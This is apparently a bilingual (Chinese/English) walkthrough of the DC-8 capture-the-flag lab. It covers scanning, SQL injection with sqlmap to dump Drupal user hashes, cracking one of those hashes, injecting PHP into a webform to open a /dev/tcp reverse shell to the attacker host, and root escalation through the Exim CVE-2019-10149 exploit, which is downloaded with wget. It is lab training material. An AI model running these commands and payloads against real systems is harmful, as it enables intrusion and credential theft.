Information collection
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:67:e3:7c, IPv4: 192.168.155.245
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.155.53 1a:ca:aa:46:d5:7f (Unknown: locally administered)
192.168.155.207 08:00:27:45:85:d6 PCS Systemtechnik GmbH
192.168.155.227 30:03:c8:49:52:4d CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.024 seconds (126.48 hosts/sec). 3 responded
┌──(root㉿anla)-[~]
└─# nmap 192.168.155.207
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 23:12 EDT
Nmap scan report for 192.168.155.207
Host is up (0.000046s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:45:85:D6 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
┌──(root㉿anla)-[~]
└─# nmap -T4 -p- -A 192.168.155.207
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 23:12 EDT
Nmap scan report for 192.168.155.207
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open http Apache httpd
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to DC-8 | DC-8
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache
MAC Address: 08:00:27:45:85:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.31 ms 192.168.155.207
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds
└─# whatweb http://192.168.155.207/
http://192.168.155.207/ [200 OK] Apache, Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Apache], IP[192.168.155.207], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], Script[text/javascript], Title[Welcome to DC-8 | DC-8], UncommonHeaders[x-content-type-options,x-generator,link], X-Frame-Options[SAMEORIGIN]
└─# dirsearch -u http://192.168.155.207/ | grep "200"
200 33KB http://192.168.155.207/CHANGELOG.txt
200 769B http://192.168.155.207/COPYRIGHT.txt
200 1KB http://192.168.155.207/install.php
200 868B http://192.168.155.207/INSTALL.mysql.txt
200 1KB http://192.168.155.207/install.php?profile=default
200 6KB http://192.168.155.207/INSTALL.txt
200 842B http://192.168.155.207/INSTALL.pgsql.txt
200 7KB http://192.168.155.207/LICENSE.txt
200 2KB http://192.168.155.207/MAINTAINERS.txt
200 2KB http://192.168.155.207/node
200 2KB http://192.168.155.207/README.txt
200 744B http://192.168.155.207/robots.txt
200 0B http://192.168.155.207/sites/example.sites.php
200 715B http://192.168.155.207/sites/all/modules/README.txt
200 431B http://192.168.155.207/sites/README.txt
200 545B http://192.168.155.207/sites/all/themes/README.txt
200 129B http://192.168.155.207/sites/all/libraries/README.txt
200 3KB http://192.168.155.207/UPGRADE.txt
200 2KB http://192.168.155.207/user
200 2KB http://192.168.155.207/user/
200 2KB http://192.168.155.207/user/login/
200 177B http://192.168.155.207/views/ajax/autocomplete/user/a
200 2KB http://192.168.155.207/web.config
200 42B http://192.168.155.207/xmlrpc.php
Penetration
1、sqlmap获取用户名密码
在主页随意点击时发现url有注入点——http://192.168.155.207/?nid=1
,尝试sqlmap
└─# sqlmap -u http://192.168.155.207/?nid=1
……
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=1 AND 5794=5794
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: nid=1 AND (SELECT 2533 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(2533=2533,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=1 AND (SELECT 7774 FROM (SELECT(SLEEP(5)))IWeE)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: nid=-1943 UNION ALL SELECT CONCAT(0x717a706a71,0x6b5a755051747278644c705a59684f736b464e7a6a44454f776959527776796a6242614e446d7476,0x716a6b6271)-- -
---
[23:38:13] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:38:13] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 25 times
[23:38:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.155.207'
[*] ending @ 23:38:13 /2024-04-26/
# 显示可以注入
获取
databases
available databases [2]:
[*] d7db
[*] information_schema
tables
Database: d7db
[88 tables]
+-----------------------------+
| block |
| cache |
| filter |
| history |
| role |
| system |
| actions |
| authmap |
| batch |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter_format |
| flood |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| site_messages_table |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
| webform |
| webform_component |
| webform_conditional |
| webform_conditional_actions |
| webform_conditional_rules |
| webform_emails |
| webform_last_download |
| webform_roles |
| webform_submissions |
| webform_submitted_data |
+-----------------------------+
columns
Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| data | longblob |
| language | varchar(12) |
| name | varchar(60) |
| status | tinyint(4) |
| access | int(11) |
| created | int(11) |
| init | varchar(254) |
| login | int(11) |
| mail | varchar(254) |
| pass | varchar(128) |
| picture | int(11) |
| signature | varchar(255) |
| signature_format | varchar(255) |
| theme | varchar(255) |
| timezone | varchar(32) |
| uid | int(10) unsigned |
+------------------+------------------+
pass
Database: d7db
Table: users
[3 entries]
+-----+---------+------------+-----------------------+---------------------------------------------------------+
| uid | name | login | mail | pass |
+-----+---------+------------+-----------------------+---------------------------------------------------------+
| 0 | <blank> | 0 | <blank> | <blank> |
| 1 | admin | 1567766626 | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| 2 | john | 1567497783 | john@blahsdfsfd.org | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-----+---------+------------+-----------------------+---------------------------------------------------------+
# 最终语句 └─# sqlmap -u http://192.168.155.207/?nid=1 -D d7db -T users -C uid,name,login,mail,pass --dump
爆破数据库中加密的pass
└─# cat DC_8_passwd.txt
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
└─# john DC_8_passwd.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
turtle (?)
Proceeding with incremental:ASCII
1g 0:00:27:13 3/3 0.000612g/s 1235p/s 1236c/s 1236C/s lj0803..lj082a
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
# 跑了挺久,只爆出了一个turtle
在web进行登录(http://192.168.155.207/user/login/
),使用用户名john登录成功。
2、利用web端反弹shell
在乱点一通后发现在Find content -> WEBFORMS -> Components(Contact Us) -> Form settings -> Text format
处可以修改为PHP code
,尝试在Confirmation message
写入<?php phpinfo(); ?>
,点击下方Save后,提交一次Contact后成功显示phpinfo页面。
继续写入php代码反弹shell
<?php system("bash -c 'sh -i &>/dev/tcp/192.168.155.245/1234 0>&1'");?>
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.155.207: inverse host lookup failed: Unknown host
connect to [192.168.155.245] from (UNKNOWN) [192.168.155.207] 42840
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
3、利用Suid提权
提权
www-data@dc-8:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
www-data@dc-8:/$ exim4 --version
exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
使用searchsploit
查找可利用漏洞程序
└─# searchsploit exim --id # 显示id不显示路径
---------------------------------------------- ---------------------------------
Exploit Title | EDB-ID
---------------------------------------------- ---------------------------------
Dovecot with Exim - 'sender_address' Remote C | 25297
Exim - 'GHOST' glibc gethostbyname Buffer Ove | 36421
Exim - 'perl_startup' Local Privilege Escalat | 39702
Exim - 'sender_address' Remote Code Execution | 25970
Exim 3.x - Format String | 20900
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Priv | 40054
Exim 4.41 - 'dns_build_reverse' Local Buffer | 756
Exim 4.41 - 'dns_build_reverse' Local Read Em | 1009
Exim 4.42 - Local Privilege Escalation | 796
Exim 4.43 - 'auth_spa_server()' Remote | 812
Exim 4.63 - Remote Command Execution | 15725
Exim 4.84-3 - Local Privilege Escalation | 39535
Exim 4.87 - 4.91 - Local Privilege Escalation | 46996
Exim 4.87 / 4.91 - Local Privilege Escalation | 47307
Exim 4.87 < 4.91 - (Local / Remote) Command E | 46974
Exim 4.89 - 'BDAT' Denial of Service | 43184
exim 4.90 - Remote Code Execution | 45671
Exim < 4.86.2 - Local Privilege Escalation | 39549
Exim < 4.90.1 - 'base64d' Remote Code Executi | 44571
Exim Buffer 1.6.2/1.6.51 - Local Overflow | 20333
Exim ESMTP 4.80 - glibc gethostbyname Denial | 35951
Exim Internet Mailer 3.35/3.36/4.10 - Format | 22066
Exim Sender 3.35 - Verification Remote Stack | 24093
Exim4 < 4.69 - string_format Function Heap Bu | 16925
PHPMailer < 5.2.20 with Exim MTA - Remote Cod | 42221
---------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿anla)-[~]
└─# searchsploit -p 46996 # 利用id查看详细信息
Exploit: Exim 4.87 - 4.91 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/46996
Path: /usr/share/exploitdb/exploits/linux/local/46996.sh
Codes: CVE-2019-10149
Verified: True
File Type: Bourne-Again shell script, ASCII text executable
查看46996.sh,提示应将脚本上传至目标机器并告知了两种提权方法,此次使用第二种
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
攻击机开启临时web服务
└─# cp /usr/share/exploitdb/exploits/linux/local/46996.sh ./
└─# python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
目标机获取漏洞利用脚本
www-data@dc-8:/$ wget http://192.168.155.245:8080/46996.sh
wget http://192.168.155.245:8080/46996.sh
--2024-04-27 21:39:39-- http://192.168.155.245:8080/46996.sh
Connecting to 192.168.155.245:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
46996.sh: Permission denied
Cannot write to '46996.sh' (Permission denied). # 在当前目录没权限……
www-data@dc-8:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
www-data@dc-8:/$ cd tmp
cd tmp
www-data@dc-8:/tmp$ wget http://192.168.155.245:8080/46996.sh
wget http://192.168.155.245:8080/46996.sh
--2024-04-27 21:40:15-- http://192.168.155.245:8080/46996.sh
Connecting to 192.168.155.245:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
Saving to: '46996.sh'
46996.sh 100%[===================>] 3.47K --.-KB/s in 0s
2024-04-27 21:40:15 (790 MB/s) - '46996.sh' saved [3552/3552]
www-data@dc-8:/tmp$ ls
ls
46996.sh
www-data@dc-8:/tmp$ chmod +x 46996.sh
chmod +x 46996.sh
运行,获取root权限
$ ./46996.sh -m netcat
./46996.sh -m netcat
raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Sat, 27 Apr 2024 21:52:39 +1000
250 dc-8 Hello ip6-localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1s0gbf-0000JM-FP
221 dc-8 closing connection
Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
cd /root
cd /root
ls
ls
flag.txt
cat flag.txt
cat flag.txt
Brilliant - you have succeeded!!!
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm also sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
This challenge was largely based on two things:
1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42
The answer to that question is...
希望你喜欢 DC-8。只是想向所有提供反馈的人,以及那些花时间完成这些小小挑战的人表示衷心的感谢。
我还要特别感谢以下几位:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
这个挑战主要基于两点:
1. 一条我看到的推特,有人问关于在Linux盒子上使用双重身份验证(2FA)是否值得。
2. @theart42 的建议
对于这个问题的答案是...
If you enjoyed this CTF, send me a tweet via @DCAU7.